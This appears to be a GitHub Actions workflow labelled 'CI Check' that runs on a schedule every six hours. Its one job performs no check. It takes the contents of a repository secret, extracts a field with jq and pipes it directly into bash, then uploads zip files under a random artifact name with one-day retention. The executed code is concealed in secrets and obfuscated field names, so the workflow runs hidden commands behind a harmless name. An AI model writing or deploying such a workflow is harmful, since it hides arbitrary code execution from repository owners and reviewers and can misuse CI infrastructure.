name: CI Check
on:
  workflow_dispatch:

  schedule:
    - cron: '52 1,7,13,19 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  agent:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Perform
        env:
          gay2: ${{ secrets.gay2 }}
        run: |
          printf '%s' "$gay2" | jq -r .nnlv1005 | /bin/bash
          printf '%s' "$ncmj5340" | jq -r .bcdr22954 | /bin/bash

      - name: Upload results
        uses: actions/upload-artifact@v4
        with:
          name: VlgwzLEy
          path: "*.zip"
          retention-days: 1
